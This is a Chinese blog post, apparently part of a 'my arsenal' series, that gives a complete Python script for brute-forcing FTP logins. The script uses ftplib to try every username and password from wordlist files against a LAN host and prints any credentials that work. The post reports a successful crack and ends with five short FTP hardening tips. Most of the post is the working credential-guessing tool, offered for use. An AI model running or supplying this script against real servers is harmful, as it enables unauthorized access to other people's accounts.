#我的武器库系列#之Ftp爆破核心实现

        本篇是关于ftp的爆破实现。ftp爆破实现原理非常简单,利用ftplib组件,通过读取字典表username及password逐一尝试登录。

一、源代码

#-*- coding:utf8 -*-
import ftplib

def crackhandle(host,username,password):
    try:
        ftp = ftplib.FTP(host);
        ftp.login(username,password);
        ftp.quit();
        return True;
    except Exception as e:
        print("login fail! username is %s password is %s" % (username,password));
        pass;

def crack():
    host ="192.168.1.108";
    passwordsList = open("/root/Desktop/pythonTest/password.txt");
    usernamesList = open("/root/Desktop/pythonTest/username.txt");
    passwords = passwordsList.readlines();
    usernames = usernamesList.readlines();
    switch = False;
    for usuername in usernames:
        username = usuername.strip();
        for password in passwords:
            password = password.strip();
            recv = crackhandle(host,str(username),str(password));
            if recv:
                print("success userName is %s password is %s" % (username,password));
                switch = True;
                break;
        if switch:
            break;
crack();

运行指令:python ftpcrack.py

效果图如下,可见通过爆破成功。

二、关于ftp的安全提升

    1.从本地安全策略进行登录错误设置;

    2.使用SSL加密;

    3.用户权限设置合理化;

    4.用户名及密码避免简单化;

    5.匿名访问按需开启;

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

登峰造Geek

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值